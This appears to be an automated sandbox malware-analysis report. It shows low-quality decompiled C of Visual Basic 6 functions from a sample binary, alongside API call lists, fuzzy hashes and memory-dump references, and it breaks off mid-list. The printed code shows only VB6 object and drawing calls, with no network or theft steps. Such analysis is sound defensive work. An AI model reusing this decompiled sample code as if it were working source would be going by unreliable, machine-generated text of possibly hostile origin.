Instruction ID: 0217190dafe9caa6164ef317201c46e86513b98b93276a989fb5f065734f16d5
Opcode Fuzzy Hash: 27ab60674cce7d22c558108e05d79de39c4a9b7617cc676467826a78e3ae5398
Instruction Fuzzy Hash: B6D11DB0A00309EFDB00DFA9C984AAEFBB9FF49300F1485AAE549E7291D7749945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004575A0, Relevance: 30.3, APIs: 20, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E004575A0(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v108;
				intOrPtr _v116;
				intOrPtr _v124;
				intOrPtr _v132;
				intOrPtr _v140;
				intOrPtr _v148;
				intOrPtr _v156;
				char _v164;
				intOrPtr* _v168;
				intOrPtr* _v176;
				signed int _v196;
				intOrPtr _v204;
				void* _t106;
				intOrPtr* _t108;
				void* _t112;
				void* _t115;
				void* _t116;
				intOrPtr _t121;
				intOrPtr _t126;
				intOrPtr* _t128;
				void* _t129;
				intOrPtr* _t132;
				void* _t161;
				char* _t162;
				intOrPtr* _t164;
				intOrPtr _t166;
				intOrPtr* _t167;
				intOrPtr* _t168;
				intOrPtr _t169;
				intOrPtr* _t182;
				intOrPtr* _t183;
				intOrPtr* _t184;
				intOrPtr* _t185;
				intOrPtr* _t186;
				intOrPtr* _t187;
				intOrPtr* _t188;
				intOrPtr* _t206;
				signed int _t208;
				signed int _t209;
				intOrPtr* _t210;
				void* _t211;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t215;
				void* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;

				_t214 = _t213 - 0xc;
				 *[fs:0x0] = _t214;
				_t215 = _t214 - 0xb4;
				_v16 = _t215;
				_v12 = 0x401760;
				_t208 = _a4;
				_v8 = _t208 & 0x00000001;
				_t209 = _t208 & 0xfffffffe;
				_a4 = _t209;
				 *((intOrPtr*)( *_t209 + 4))(_t209, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t211);
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v164 = 0;
				E00461600(__ebx, __edi, _t209);
				_t106 =  *((intOrPtr*)( *_t209 + 0x324))(_t209);
				_t206 = __imp____vbaObjSet;
				_t108 =  *_t206( &_v48, _t106);
				_v176 = _t108;
				_t164 =  *_t206( &_v36,  *((intOrPtr*)( *_t209 + 0x334))(_t209));
				_t112 =  *((intOrPtr*)( *_t164 + 0x188))(_t164,  &_v40);
				asm("fclex");
				if(_t112 < 0) {
					__imp____vbaHresultCheckObj(_t112, _t164, 0x40937c, 0x188);
				}
				_v40 = 0;
				_t115 =  *_t206( &_v44, _v40);
				_t166 = _v176;
				_t116 =  *((intOrPtr*)( *_v176 + 0x64))(_t166, _t115);
				asm("fclex");
				if(_t116 < 0) {
					__imp____vbaHresultCheckObj(_t116, _t166, 0x40937c, 0x64);
				}
				__imp____vbaFreeObjList(3,  &_v36,  &_v44,  &_v48);
				_t216 = _t215 + 0x10;
				_t167 =  *_t206( &_v36,  *((intOrPtr*)( *_t209 + 0x324))(_t209));
				_t121 =  *((intOrPtr*)( *_t167 + 0x88))(_t167,  &_v164);
				asm("fclex");
				if(_t121 < 0) {
					__imp____vbaHresultCheckObj(_t121, _t167, 0x40937c, 0x88);
				}
				__imp____vbaFpI4();
				_v32 = _t121;
				__imp____vbaFreeObj();
				_t168 =  *_t206( &_v36,  *((intOrPtr*)( *_t209 + 0x324))(_t209));
				_t126 =  *((intOrPtr*)( *_t168 + 0x80))(_t168,  &_v164);
				asm("fclex");
				if(_t126 < 0) {
					__imp____vbaHresultCheckObj(_t126, _t168, 0x40937c, 0x80);
				}
				__imp____vbaFpI4();
				_t169 = _t126;
				__imp____vbaFreeObj();
				_t128 =  *_t206( &_v36,  *((intOrPtr*)( *_t209 + 0x324))(_t209));
				_v168 = _t128;
				_t129 =  *((intOrPtr*)( *_t128 + 0x60))(_t128,  &_v40);
				asm("fclex");
				if(_t129 < 0) {
					__imp____vbaHresultCheckObj(_t129, _v168, 0x40937c, 0x60);
				}
				_t132 =  *_t206( &_v48,  *((intOrPtr*)( *_t209 + 0x334))(_t209));
				_t217 = _t216 - 0x10;
				_v196 = _v40;
				_t210 = _t132;
				_t182 = _t217;
				_t218 = _t217 - 0x10;
				_v96 = 2;
				 *_t182 = 3;
				_v40 = 0;
				 *((intOrPtr*)(_t182 + 4)) = _v156;
				 *((intOrPtr*)(_t182 + 8)) = 0x330008;
				 *((intOrPtr*)(_t182 + 0xc)) = _v148;
				_t183 = _t218;
				_t219 = _t218 - 0x10;
				 *_t183 = 3;
				 *((intOrPtr*)(_t183 + 4)) = _v140;
				 *((intOrPtr*)(_t183 + 8)) = _v32;
				 *((intOrPtr*)(_t183 + 0xc)) = _v132;
				_t184 = _t219;
				_t220 = _t219 - 0x10;
				 *_t184 = 3;
				 *((intOrPtr*)(_t184 + 4)) = _v124;
				 *((intOrPtr*)(_t184 + 8)) = _t169;
				 *((intOrPtr*)(_t184 + 0xc)) = _v116;
				_t185 = _t220;
				_t221 = _t220 - 0x10;
				 *_t185 = 2;
				 *((intOrPtr*)(_t185 + 4)) = _v108;
				 *((intOrPtr*)(_t185 + 8)) = 0;
				 *((intOrPtr*)(_t185 + 0xc)) = _v100;
				_t186 = _t221;
				_t222 = _t221 - 0x10;
				 *_t186 = _v96;
				 *((intOrPtr*)(_t186 + 4)) = _v92;
				 *((intOrPtr*)(_t186 + 8)) = 0;
				 *((intOrPtr*)(_t186 + 0xc)) = _v84;
				_t187 = _t222;
				 *_t187 = 3;
				 *((intOrPtr*)(_t187 + 4)) = _v76;
				 *((intOrPtr*)(_t187 + 8)) = _v32;
				 *((intOrPtr*)(_t187 + 0xc)) = _v68;
				_t188 = _t222 - 0x10;
				 *_t188 = 3;
				 *((intOrPtr*)(_t188 + 4)) = _v60;
				 *((intOrPtr*)(_t188 + 8)) = _t169;
				 *((intOrPtr*)(_t188 + 0xc)) = _v52;
				_v204 =  *_t210;
				_t161 =  *((intOrPtr*)(_v204 + 0x280))(_t210,  *_t206( &_v44, _v196, 0, 0));
				asm("fclex");
				if(_t161 < 0) {
					__imp____vbaHresultCheckObj(_t161, _t210, 0x40937c, 0x280);
				}
				_t162 =  &_v44;
				__imp____vbaFreeObjList(3,  &_v36, _t162,  &_v48);
				_v8 = 0;
				asm("wait");
				_push(0x4578fd);
				return _t162;
			}

0x004575a3
0x004575b2
0x004575b9
0x004575c2
0x004575c5
0x004575cc
0x004575d4
0x004575d7
0x004575db
0x004575e0
0x004575e5
0x004575e8
0x004575eb
0x004575ee
0x004575f1
0x004575f7
0x004575ff
0x00457605
0x00457610
0x00457615
0x00457628
0x00457631
0x00457639
0x0045763b
0x00457649
0x00457649
0x0045765c
0x00457666
0x0045766a
0x00457672
0x00457677
0x00457679
0x00457684
0x00457684
0x00457698
0x004576a0
0x004576b1
0x004576bd
0x004576c5
0x004576c7
0x004576d5
0x004576d5
0x004576e1
0x004576ea
0x004576ed
0x00457703
0x0045770f
0x00457717
0x00457719
0x00457727
0x00457727
0x00457733
0x0045773c
0x0045773e
0x00457752
0x0045775b
0x00457761
0x00457766
0x00457768
0x00457779
0x00457779
0x0045778d
0x00457792
0x00457795
0x0045779b
0x0045779d
0x004577a4
0x004577a7
0x004577ae
0x004577b6
0x004577bf
0x004577c7
0x004577d0
0x004577d3
0x004577da
0x004577dd
0x004577e5
0x004577eb
0x004577f1
0x004577f4
0x004577fb
0x004577fe
0x00457803
0x00457809
0x0045780c
0x0045780f
0x00457816
0x00457819
0x0045781e
0x00457823
0x00457829
0x0045782f
0x00457831
0x00457834
0x00457839
0x0045783e
0x00457844
0x00457847
0x00457851
0x00457856
0x0045785c
0x00457862
0x00457865
0x0045786c
0x00457871
0x00457877
0x0045787a
0x0045788c
0x0045789c
0x004578a4
0x004578a6
0x004578b4
0x004578b4
0x004578bd
0x004578c8
0x004578d1
0x004578d8
0x004578d9
0x00000000

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00457610
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457626
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188), ref: 00457649
__vbaObjSet.MSVBVM60(?,?), ref: 00457666
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000064), ref: 00457684
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00457698
__vbaObjSet.MSVBVM60(?,00000000), ref: 004576AF
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000088), ref: 004576D5
__vbaFpI4.MSVBVM60 ref: 004576E1
__vbaFreeObj.MSVBVM60 ref: 004576ED
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457701
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000080), ref: 00457727
__vbaFpI4.MSVBVM60 ref: 00457733
__vbaFreeObj.MSVBVM60 ref: 0045773E
__vbaObjSet.MSVBVM60(?,00000000), ref: 00457752
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000060), ref: 00457779
__vbaObjSet.MSVBVM60(?,00000000), ref: 0045778D
__vbaObjSet.MSVBVM60(?,?,00000000,00000000), ref: 00457892
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000280), ref: 004578B4
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004578C8

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$Free$List$New2
String ID:
API String ID: 2976451202-0
Opcode ID: aa713bceb1ace2c2cc1a72a8aa19680255e11b346dfce96aa0e0094d067cf5f9
Instruction ID: 53f404ccf7bcc997886ce9e0de41502f28dec9a8f03e9c635607ebedda1cabb6
Opcode Fuzzy Hash: aa713bceb1ace2c2cc1a72a8aa19680255e11b346dfce96aa0e0094d067cf5f9
Instruction Fuzzy Hash: DCB11C74A00218AFDB40DFA8C984B9EBBF8FF0C304F1485A9E549E7291D6759946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00462140, Relevance: 28.8, APIs: 19, Instructions: 265COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000004,0046C088,00000003,00000003,00000000,00000000,00000000,00000000,00000002,00000000,00401438), ref: 00462196
__vbaNew2.MSVBVM60(00405960,0046C010), ref: 004621FF
__vbaObjSet.MSVBVM60(?,00000000), ref: 00462218
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 0046223F
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0046225D
__vbaFreeObj.MSVBVM60 ref: 0046226C
_adj_fdiv_m64.MSVBVM60 ref: 004622B7
__vbaFpI4.MSVBVM60 ref: 004622C6
_adj_fdiv_m64.MSVBVM60 ref: 00462304
_adj_fdiv_m64.MSVBVM60 ref: 00462326
__vbaFpI4.MSVBVM60 ref: 00462335
__vbaNew2.MSVBVM60(00405960,0046C010), ref: 00462427
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046245B
__vbaLateIdSt.MSVBVM60(00000000), ref: 00462462
__vbaFreeObj.MSVBVM60 ref: 0046246B
__vbaNew2.MSVBVM60(00405960,0046C010), ref: 004624A3
__vbaObjSet.MSVBVM60(?,00000000), ref: 004624D4
__vbaLateIdSt.MSVBVM60(00000000), ref: 004624DB
__vbaFreeObj.MSVBVM60 ref: 004624E4

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$FreeNew2_adj_fdiv_m64$Late$CheckErrorHresultRedimSystem
String ID:
API String ID: 787661531-0
Opcode ID: c9c7d7a3d829cb00ab07e0e1edc413aa484ff642551a1d70edd526f150e067dc
Instruction ID: 9c5dd35c16c6465717faa48d21be8cee616bb2401bb533aecb2202b5f01de4fe
Opcode Fuzzy Hash: c9c7d7a3d829cb00ab07e0e1edc413aa484ff642551a1d70edd526f150e067dc
Instruction Fuzzy Hash: 1EB18470600204EFCB08DFA9DE98B7A7BB5FB48714B11816AE445B7371E7B49841CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 004567B0, Relevance: 28.7, APIs: 19, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00456853
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00456876
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 00456895
__vbaFreeObj.MSVBVM60 ref: 004568A4
__vbaFpI2.MSVBVM60 ref: 00456940
__vbaObjSet.MSVBVM60(?,00000000), ref: 00456956
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00456979
#588.MSVBVM60(00000000,00000000,00000000), ref: 00456982
__vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000), ref: 004569A0
__vbaFreeObj.MSVBVM60 ref: 004569A9
__vbaObjSet.MSVBVM60(?,00000000), ref: 00456A18
__vbaLateIdSt.MSVBVM60(00000000), ref: 00456A1F
__vbaFreeObj.MSVBVM60 ref: 00456A28
__vbaObjSet.MSVBVM60(?,00000000), ref: 00456A5A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000264), ref: 00456A79
__vbaFreeObj.MSVBVM60 ref: 00456A88
__vbaObjSet.MSVBVM60(?,00000000), ref: 00456AB7
__vbaLateIdSt.MSVBVM60(00000000), ref: 00456ABA
__vbaFreeObj.MSVBVM60 ref: 00456AC3

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresult$ErrorLateNew2System$#588List
String ID:
API String ID: 2526873969-0
Opcode ID: d7eb75ff5822dbbeb153d69e9a065ddddbaaa6c6b9817d9e241f86d3e9d7082e
Instruction ID: b1dbd6f1a0cc3e5d56e36f5fbb0f78d402cc1efc9b4ae72db5322bc0a7bd9cf1
Opcode Fuzzy Hash: d7eb75ff5822dbbeb153d69e9a065ddddbaaa6c6b9817d9e241f86d3e9d7082e
Instruction Fuzzy Hash: C3916070A00205DFDB04DFA5DD84AAEBBB8FF49701B10813AE445E72A1EB789845CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00454B80, Relevance: 27.3, APIs: 18, Instructions: 315
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00454B80(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				intOrPtr _v128;
				intOrPtr _v136;
				intOrPtr _v144;
				intOrPtr _v152;
				intOrPtr _v160;
				char _v168;
				signed char _v172;
				char _v176;
				intOrPtr* _v180;
				intOrPtr* _v188;
				signed int _v232;
				void* _t121;
				intOrPtr* _t123;
				intOrPtr* _t125;
				void* _t126;
				void* _t129;
				void* _t130;
				void* _t135;
				void* _t140;
				void* _t144;
				void* _t148;
				signed char _t151;
				intOrPtr* _t154;
				signed char _t170;
				void* _t173;
				char* _t175;
				intOrPtr _t179;
				intOrPtr* _t180;
				intOrPtr* _t181;
				intOrPtr* _t182;
				intOrPtr* _t183;
				void* _t184;
				intOrPtr* _t204;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				intOrPtr* _t224;
				intOrPtr* _t225;
				intOrPtr _t227;
				intOrPtr* _t231;
				signed int _t233;
				signed int _t234;
				signed char _t235;
				void* _t236;
				void* _t238;
				intOrPtr _t239;
				intOrPtr _t240;
				void* _t241;
				intOrPtr* _t242;
				intOrPtr* _t243;
				intOrPtr* _t244;
				intOrPtr* _t245;
				intOrPtr* _t246;
				intOrPtr* _t247;
				intOrPtr* _t248;
				intOrPtr _t253;

				_t239 = _t238 - 0xc;
				 *[fs:0x0] = _t239;
				_t240 = _t239 - 0xd4;
				_v16 = _t240;
				_v12 = 0x401640;
				_t233 = _a4;
				_v8 = _t233 & 0x00000001;
				_t234 = _t233 & 0xfffffffe;
				_a4 = _t234;
				 *((intOrPtr*)( *_t234 + 4))(_t234, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t236);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v44 = 0;
				_v48 = 0;
				_v52 = 0;
				_v168 = 0;
				_v172 = 0;
				_v176 = 0;
				E00461600(0, __edi, _t234);
				_t121 =  *((intOrPtr*)( *_t234 + 0x328))(_t234);
				_t231 = __imp____vbaObjSet;
				_t123 =  *_t231( &_v40, _t121);
				_v188 = _t123;
				_t125 =  *_t231( &_v28,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				_v180 = _t125;
				_t126 =  *((intOrPtr*)( *_t125 + 0x188))(_t125,  &_v32);
				asm("fclex");
				if(_t126 < 0) {
					__imp____vbaHresultCheckObj(__eax, _v180, 0x40937c, 0x188);
				}
				_v32 = 0;
				_t129 =  *_t231( &_v36, _v32);
				_t179 = _v188;
				_t130 =  *((intOrPtr*)( *_v188 + 0x64))(_t179, _t129);
				asm("fclex");
				if(_t130 < 0) {
					__imp____vbaHresultCheckObj(_t130, _t179, 0x40937c, 0x64);
				}
				__imp____vbaFreeObjList(3,  &_v28,  &_v36,  &_v40);
				_t241 = _t240 + 0x10;
				_t180 =  *_t231( &_v28,  *((intOrPtr*)( *_t234 + 0x328))(_t234));
				_t135 =  *((intOrPtr*)( *_t180 + 0x60))(_t180,  &_v32);
				asm("fclex");
				if(_t135 < 0) {
					__imp____vbaHresultCheckObj(_t135, _t180, 0x40937c, 0x60);
				}
				_t181 =  *_t231( &_v36,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				_t140 =  *((intOrPtr*)( *_t181 + 0x110))(_t181,  &_v168);
				asm("fclex");
				if(_t140 < 0) {
					__imp____vbaHresultCheckObj(_t140, _t181, 0x40937c, 0x110);
				}
				_t182 =  *_t231( &_v40,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				_t144 =  *((intOrPtr*)( *_t182 + 0x108))(_t182,  &_v172);
				asm("fclex");
				if(_t144 < 0) {
					__imp____vbaHresultCheckObj(_t144, _t182, 0x40937c, 0x108);
				}
				_t183 =  *_t231( &_v44,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				_t148 =  *((intOrPtr*)( *_t183 + 0x110))(_t183,  &_v176);
				asm("fclex");
				if(_t148 < 0) {
					__imp____vbaHresultCheckObj(_t148, _t183, 0x40937c, 0x110);
				}
				_t151 =  *_t231( &_v52,  *((intOrPtr*)( *_t234 + 0x334))(_t234));
				asm("fchs");
				_t235 = _t151;
				_v76 = _v176;
				asm("fnstsw ax");
				if((_t151 & 0x0000000d) == 0) {
					_t242 = _t241 - 0x10;
					_v232 = _v32;
					_t154 = _t242;
					_t243 = _t242 - 0x10;
					 *_t154 = 3;
					_v100 = 0xa;
					_v92 = 0x80020004;
					 *((intOrPtr*)(_t154 + 4)) = _v160;
					_t221 = _t243;
					_t244 = _t243 - 0x10;
					_v32 = 0;
					 *((intOrPtr*)(_t154 + 8)) = 0xcc0020;
					_t184 =  *_t235;
					_v68 = 4;
					 *((intOrPtr*)(_t154 + 0xc)) = _v152;
					 *_t221 = 0xa;
					 *((intOrPtr*)(_t221 + 4)) = _v144;
					 *((intOrPtr*)(_t221 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t221 + 0xc)) = _v136;
					_t222 = _t244;
					_t245 = _t244 - 0x10;
					 *_t222 = 0xa;
					 *((intOrPtr*)(_t222 + 4)) = _v128;
					 *((intOrPtr*)(_t222 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t222 + 0xc)) = _v120;
					_t223 = _t245;
					_t246 = _t245 - 0x10;
					 *_t223 = 0xa;
					 *((intOrPtr*)(_t223 + 4)) = _v112;
					 *((intOrPtr*)(_t223 + 8)) = 0x80020004;
					 *((intOrPtr*)(_t223 + 0xc)) = _v104;
					_t224 = _t246;
					_t247 = _t246 - 0x10;
					 *_t224 = _v100;
					 *((intOrPtr*)(_t224 + 4)) = _v96;
					 *((intOrPtr*)(_t224 + 8)) = _v92;
					 *((intOrPtr*)(_t224 + 0xc)) = _v88;
					_t225 = _t247;
					 *_t225 = 4;
					 *((intOrPtr*)(_t225 + 4)) = _v80;
					 *((intOrPtr*)(_t225 + 8)) = _v76;
					 *((intOrPtr*)(_t225 + 0xc)) = _v72;
					_t248 = _t247 - 0x10;
					_t253 = _v168 -  *0x401638;
					_t204 = _t248;
					 *_t204 = _v68;
					_t227 = _v56;
					 *((intOrPtr*)(_t204 + 4)) = _v64;
					_t170 = _v172;
					 *(_t204 + 8) = _t170;
					_push(_t204);
					asm("fnstsw ax");
					if((_t170 & 0x0000000d) != 0) {
						goto L19;
					}
					 *((intOrPtr*)(_t204 + 0xc)) = _t227;
					 *_t248 = _t253;
					_t173 =  *((intOrPtr*)(_t184 + 0x280))(_t235,  *_t231( &_v48, _v232, 0));
					asm("fclex");
					if(_t173 < 0) {
						__imp____vbaHresultCheckObj(_t173, _t235, 0x40937c, 0x280);
					}
					_t175 =  &_v36;
					__imp____vbaFreeObjList(6,  &_v28, _t175,  &_v40,  &_v44,  &_v48,  &_v52);
					_v8 = 0;
					asm("wait");
					_push(0x454f52);
					return _t175;
				}
				return __imp____vbaFPException();
			}

0x00454b83
0x00454b92
0x00454b99
0x00454ba2
0x00454ba5
0x00454bac
0x00454bb4
0x00454bb7
0x00454bbb
0x00454bc0
0x00454bc5
0x00454bc8
0x00454bcb
0x00454bce
0x00454bd1
0x00454bd4
0x00454bd7
0x00454bda
0x00454be0
0x00454be6
0x00454bec
0x00454bf4
0x00454bfa
0x00454c05
0x00454c0a
0x00454c1b
0x00454c24
0x00454c2a
0x00454c32
0x00454c34
0x00454c48
0x00454c48
0x00454c5b
0x00454c61
0x00454c65
0x00454c6d
0x00454c72
0x00454c74
0x00454c7f
0x00454c7f
0x00454c93
0x00454c9b
0x00454cac
0x00454cb5
0x00454cba
0x00454cbc
0x00454cc7
0x00454cc7
0x00454cdd
0x00454ce9
0x00454cf1
0x00454cf3
0x00454d01
0x00454d01
0x00454d17
0x00454d23
0x00454d2b
0x00454d2d
0x00454d3b
0x00454d3b
0x00454d51
0x00454d5d
0x00454d65
0x00454d67
0x00454d75
0x00454d75
0x00454d89
0x00454d91
0x00454d93
0x00454d9a
0x00454d9d
0x00454da1
0x00454daa
0x00454dad
0x00454db3
0x00454dba
0x00454dbd
0x00454dc5
0x00454dcc
0x00454dd3
0x00454dd6
0x00454dd8
0x00454ddb
0x00454de2
0x00454deb
0x00454ded
0x00454df4
0x00454e02
0x00454e0a
0x00454e12
0x00454e1a
0x00454e1d
0x00454e22
0x00454e25
0x00454e2a
0x00454e32
0x00454e3a
0x00454e3d
0x00454e42
0x00454e45
0x00454e4a
0x00454e52
0x00454e58
0x00454e5e
0x00454e60
0x00454e63
0x00454e68
0x00454e6e
0x00454e76
0x00454e7c
0x00454e7e
0x00454e83
0x00454e89
0x00454e8c
0x00454e9b
0x00454e9e
0x00454ea4
0x00454ea6
0x00454ea8
0x00454eab
0x00454eae
0x00454eb4
0x00454eb7
0x00454eb8
0x00454ebc
0x00000000
0x00000000
0x00454ec8
0x00454ecb
0x00454ed9
0x00454ee1
0x00454ee3
0x00454ef1
0x00454ef1
0x00454f06
0x00454f11
0x00454f1a
0x00454f21
0x00454f22
0x00000000
0x00454f22
0x00401e9c

APIs

Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046164A
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461669
Part of subcall function 00461600: __vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461680
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 00461699
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000188,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004616BC
Part of subcall function 00461600: __vbaObjSet.MSVBVM60(?,?), ref: 004616D3
Part of subcall function 00461600: __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000064), ref: 004616E9
Part of subcall function 00461600: __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 004616FD

__vbaObjSet.MSVBVM60(?,00000000), ref: 00454C05
__vbaObjSet.MSVBVM60(?,00000000), ref: 00454C1B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000188), ref: 00454C48
__vbaObjSet.MSVBVM60(?,?), ref: 00454C61
